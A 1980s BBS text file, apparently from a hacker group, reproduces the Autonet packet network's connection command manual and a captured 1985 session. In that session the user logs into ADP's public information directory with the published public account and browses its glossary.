Command: [ C NAME;H;T D1 ]

Autonet will respond to this dialog by:

(1) setting the correct parameters for your terminal
model

(2) typing out the connection dialog HELP file

(3) connecting you to your destination and issuing this
message:

CALL CONNECTED


AUTONET CONNECTION DIALOG COMMAND SUMMARY


COMMAND FORMAT FUNCTION EXAMPLE

C nnnnnnnnnn Requests a connection to a host C 5555
whose address is nnnnnnnnnn.

C cccccccccc Requests a connection to a host C NAME
whose name is cccccccccc.

H Prints this list of commands. H

ID xxxxxxxxx Identifies the user and re- ID 1234-567
quests a connection to the
host associated with the
user's identity code xxxxxxxxx.

T cn Identifies a terminal model by T D1
the terminal identity code cn.
See the TERMINAL option of AID.

* Use a space to separate a command name and its parameter.

** Use a semicolon (;) to separate commands which
occupy the same line.


AUTONET CONNECTION DIALOG COMMAND DESCRIPTIONS

In all examples, information the user types is shown
in square brackets ([ ]).


The C Command


PURPOSE The C command requests a connection to a sub-
scribing host computer. The particular host can
be specified by a numerical address, or, through
special arrangements, by an alphabetic name. The
terminal session is charged to the subscribing
host.


GENERAL FORM C nnnnnnnnnn

Where:

nnnnn~nnnnn is the numeric address assigned by
Autonet to the host computer.

or

C cccccccccc

Where:

cccccccccc is the alphabetic name chosen by the
subscriber for the host computer.


EXAMPLE Autonet Line 3130157042
Command:[ C 5555 ]

CALL CONNECTED

(Proceed with host log-on procedure.)


NOTES If no host exists at the given address or by the
given name, the user will receive the message:

?**No such host.

If the subscribing host will not accept the char-
ges, the user will receive the message:

?**User ID required.


The ID Command


PURPOSE The ID command identifies the user and requests a
connection to the host associated with that
user's identification code. The network will
require the user to enter a valid password before
completing the connection. The terminal session
is charged to the user.


GENERAL FORM ID xxxxxxxxx

Where:

xxxxxxxxx is an alphanumeric user identification
code.

EXAMPLE Autonet Line 3130157042
Command:[ ID 1234-567 ]
XXXXXXPassword

CALL CONNECTED

(Proceed with host log-on procedure.)


NOTES To connect to a destination other than the
default host, use the C command in conjunction
with the ID command.


EXAMPLE Autonet Line 3130157042
Command:[ ID 2345-12;C 5555 ]
XXXXXXPassword

CALL CONNECTED

Proceed with the host log-on procedure.


The H Command


PURPOSE The H command prints a connection dialog command
summary as a helpful reminder for users. The H
command may be used in conjuction with other com-
mands, or it may be used as a single command
PRIOR to issuing the C or the ID commands. If
used individually, the network will follow the
summary display with a prompt for another com-
mand.


GENERAL FORM H

EXAMPLE Autonet Line 3130157042
Command:[ H ]
.
.
.

Autonet displays Command Summary.
.
.
.

Command:


EXAMPLE Autonet Line 3130157042
Command:[ H;C 5555 ]

Autonet displays Command Summary.

CALL CONNECTED

(Proceed with host system log-on procedures.)


The T Command


PURPOSE The T command identifies the use\}r's terminal
model so that the network can set certain operat-
ing parameters to optimize the terminal's charac-
teristics. The T command may be used in conjuc-
tion with other commands, or it may be used as a
single command PRIOR to issuing the C or the ID
commands. If used individually, the network will
establish the correct parameters and will prompt
for another command.


GENERAL FORM T cn

Where:

cn is the alphanumeric code which identifies the
terminal model.

EXAMPLE Autonet Line 3130157042
Command:[ T D1 ]

(Autonet establishes optimal parameters for ter-
minal model.)

Command:


EXAMPLE Autonet Line 3130157042
Command:[ T D1;C 5555 ]

Autonet sets optimal parameters for terminal
model and requests a connection to host 5555.


NOTES A list of codes for commonly used terminal models
appears in "HOW TO USE AUTONET" and under the op-
tion TERMINAL in Autonet's on-line information
directory, AID. Contact your Autonet Sales
Specialist for further information.

-----------------------------------------------------------------------------
Another Great Directory from Hacker Supreme. (Ninja Squirrel /+\, Logan - 5,)
(Zaphod Breeblebox, Silicon Rat, Lord Vision, Crazy Horse, Lancelot-1.)
-----------------------------------------------------------------------------

==============================================================================
[ ------------------- Infinity-Cartel Alliance Network --------------------- ]
[ The Cartel 1&2 Adventure/AE/BBS 5 meg ------ 206-825-6236, or 206-939-6162 ]
[ Infinity's Edge Adventure/AE/Cat/BBS 10 meg ----------------- 805-683-2725 ]
[ The Center Of Eternity BBS ---------------------------------- 817-496-1777 ]
[ ---------- The Cartel #3 and The Cartel 20 Meg AE comming soon! ---------- ]
==============================================================================


X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X

Another file downloaded from: NIRVANAnet(tm)

& the Temple of the Screaming Electron Jeff Hunter 510-935-5845
Rat Head Ratsnatcher 510-524-3649
Burn This Flag Zardoz 408-363-9766
realitycheck Poindexter Fortran 415-567-7043
Lies Unlimited Mick Freen 415-583-4102

Specializing in conversations, obscure information, high explosives,
arcane knowledge, political extremism, diversive sexuality,
insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.

Full access for first-time callers. We don't want to know who you are,
where you live, or what your phone number is. We are not Big Brother.

"Raw Data for Raw Nerves"

X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X


[ AUTONET SERIES (Section 2) ]

@C 31340

313 40 CONNECTED

Autonet Line 3130158025

Command: H

The Autonet connection dialog commands are:

COMMAND FORMAT FUNCTION EXAMPLE

C nnnnnnnnnn Requests a connection to a host C 5555
whose address is nnnnnnnnnn.

C cccccccccc Requests a connection to a host C NAME
whose name is cccccccccc.

H Prints this list of commands. H

ID xxxxxxxxx Identifies the user and re- ID 1234-567
quests a connection to the
host associated with the
user's identity code xxxxxxxxx.

T cn Identifies a terminal model by T D1
the terminal identity code cn.
See the TERMINAL option of AID.

* Use a space to separate a command name and its parameter.

** Use a semicolon (;) to separate commands which occupy the same line.

*** To access the Autonet Information Directory (AID):

Type: C ADPNS
Use the account-user number: 1300-7777
Use the password: AID

Command: C ADPNS

ADP Network Services
Account-User Number--1300-7777
Password: AID

Job 45 Sys #161 Line 15825 02:02 EDT (06:02 GMT) Fri 13-Sep-85

*** Welcome to AID - the Autonet Information Directory ***

AID is a free, public database of information about ADP's
value-added network and data communications services. To
obtain a list of your options, please type 'HELP'. Use the
'HELP' command whenever you need assistance.

OPTION: HELP

ACCESS - Third party network access information
AID - Lists how to use AID
AUTOMAIL - Describes ADP's Computer Based Message System
BYE - Exits from network and disconnects terminal
CHANGES - Lists impending phone number changes
CONNECT - Lists network connection procedures
DOCUMENT - Lists Autonet publications
DONE - Exits from network and disconnects terminal
GLOSS - Lists glossary of Autonet communications terms
HELP - Lists this set of options
INTERNATL - International network access information
MESSAGES - Lists network messages
NEWS - Lists Autonet news items and service bulletins
PHONE - Lists network access phone numbers
2400BPS - 2400 Baud dial-up access numbers
TERMINAL - Lists Autonet terminal identity codes
TEST - Network and terminal test programs
TROUBLE - Lists network trouble reporting procedures

OPTION: GLOSS

Align paper and press the RETURN key.

Glossary
Last Updated: July 1985
Last Reviewed: July 1985
3 pages

Autonet Communications Glossary

Access Location A city in which Autonet can be accessed through a
toll-free telephone call.

AHIP Asynchronous Host Interface Processor. A com-
munication computer that connects a host computer
to Autonet.

Asynchronous ASCII A device consisting of a keyboard which represents
Terminal 128 distinct characters (such as upper and lower case
alphabetics, numerals, punctuation and control
characters) and a display screen or printing mechanism.
The terminal is used to send data to, or receive data
from a computer by a start-stop transmission method.

ATC Asynchronous Terminal Concentrator. An Autonet
network access service arrangement which also
features local async ports for multiple terminals.

Autonet An Autonet access facility consisting of one
Communication or more network nodes.
Center

AutoWATS A host interface arrangement for users whose
initial data communications needs are small.
The service provides subscribers with value-
added WATS service at 50% less than conventional
WATS lines.

Bit The smallest unit of data.

BPS Bits Per Second. A rate of speed at which bits
are transmitted.

CCITT The International Consultative Committee
for Telegraphy and Telephony of the
International Telecommunications Union,
which recommends industry standards.

Dial Back-up A service option which establishes
a temporary circuit to route around line
or node failures.

DTF Dedicated Terminal Facility. An Autonet network
access service arrangement which features
a hardwired connection to an access port.

Error Detection A system which detects transmission errors
and Correction and causes data to be retransmitted un-
Code til it is received correctly.

Front End A device which performs communications processing
Processor and certain protocol functions before passing
data to the host.

HAL Host Access Line. A single leased line which
supports one simultaneous connection between
a host computer and a network node.

HCF Host Communication Facility. A leased com-
munication line which connects a host computer
to a network node.

Host A computer system which processes data,
as contrasted to a computer used for com-
munications purposes.

Leased Access A communication line used to con-
Channel nect client equipment to a port at an
Autonet Communication Center, or to a con-
centrator.

Modem A device which converts digital signals to
analog form for transmission over tele-
phone lines.

Node An Autonet communication computer which
accepts and transmits packets, and performs
network access and interface functions.

Non Prime A cost-saving Public Dial-In service
Subscription option featuring reduced rates
during off-peak business hours.

Packet A unit of traffic on a packet-switching
network. A packet consists of a destination
address, special control function characters,
error detection code, as well as message
data, all arranged in a special format.

Packet-switching Method of transmitting data between
client equipment by means of formated packets.

Port A communication interface between Autonet and
a terminal or host computer.

Private Rotary A service option which features access
to a number of access ports through a single
private number.

Protocol A pre-established order for the transfer
of data over a communications channel.

Remote Access A network connection which establishes
communication with data processing equipment
from a distant location.

Traffic Data transmitted between user terminals
and host computers via Autonet.

Virtual Dedicated A billing option which features a
Ports flat monthly rate in lieu

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT